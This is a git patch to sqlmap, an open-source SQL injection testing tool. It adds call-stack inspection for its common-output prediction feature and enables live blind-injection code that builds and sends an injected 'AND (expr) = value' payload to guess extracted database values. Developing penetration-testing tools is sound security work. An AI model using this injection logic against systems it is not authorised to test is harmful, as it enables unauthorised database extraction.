From 7f0db26e99811ea86fe51db71b7f9c97e7749eec Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 26 May 2010 09:48:20 +0000 Subject: [PATCH] more code updates regarding good samaritan (common output) feature --- lib/core/common.py | 18 ++++++++++++++++-- lib/techniques/blind/inference.py | 17 ++++++++++------- txt/common-outputs.txt | 2 +- 3 files changed, 27 insertions(+), 10 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 1c44c4fd1..cb70edb95 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import codecs import cProfile +import inspect import os import random import re @@ -1270,10 +1271,23 @@ def getGoodSamaritanParameters(part, prevValue, originalCharset): else: return None, None, originalCharset -def getCompiledRegex(regex): +def getCompiledRegex(regex, args=()): if regex in __compiledRegularExpressions: return __compiledRegularExpressions[regex] else: - retVal = re.compile(regex) + retVal = re.compile(regex, *args) __compiledRegularExpressions[regex] = retVal return retVal + +#dumper.dbTableValues(conf.dbmsHandler.dumpTable()) -> dumpTable +def getPartRun(): + commonPartsDict = { "dumpTable":"Tables", "getColumns":"Columns", "getUsers":"Users", "getBanner":"Banners" } + retVal = None + stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()] + reobj = getCompiledRegex('conf\.dbmsHandler\.([^(]+)\(\)') + for i in xrange(len(stack) - 1, 0, -1): + match = reobj.search(stack[i]) + if match: + retVal = match.groups()[0] + break + return commonPartsDict[retVal] if retVal in commonPartsDict else retVal diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 1772aa5e5..5fed7b363 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -31,6 +31,7 @@ from lib.core.common import dataToSessionFile from lib.core.common import dataToStdout from lib.core.common import getCharset from lib.core.common import getGoodSamaritanParameters +from lib.core.common import getPartRun from lib.core.common import replaceNewlineTabs from lib.core.common import safeStringFormat from lib.core.convert import urlencode @@ -56,6 +57,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None asciiTbl = getCharset(charsetType) + kb.partRun = getPartRun() if conf.useCommonPrediction else None + if "LENGTH(" in expression or "LEN(" in expression: firstChar = 0 elif conf.firstChar is not None and ( isinstance(conf.firstChar, int) or ( isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit() ) ): @@ -376,13 +379,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if singleValue is None: val = getChar(index, predictedCharset, False) if predictedCharset else None else: - #forgedPayload = safeStringFormat('AND (%s) = \'%s\'', (expressionUnescaped, singleValue)) - #result = Request.queryPage(urlencode(forgedPayload)) - #if result: - # finalValue = singleValue - # break - pass - + query = agent.prefixQuery(" %s" % safeStringFormat('AND (%s) = \'%s\'', (expressionUnescaped, singleValue))) + query = agent.postfixQuery(query) + payload = agent.payload(newValue=query) + result = Request.queryPage(urlencode(payload)) + if result: + finalValue = singleValue + break if not val: val = getChar(index, otherCharset) else: diff --git a/txt/common-outputs.txt b/txt/common-outputs.txt index fc6533328..f45aeb776 100644 --- a/txt/common-outputs.txt +++ b/txt/common-outputs.txt @@ -2,4 +2,4 @@ users [Users] -luther \ No newline at end of file +'root'@'127.0.0.1' \ No newline at end of file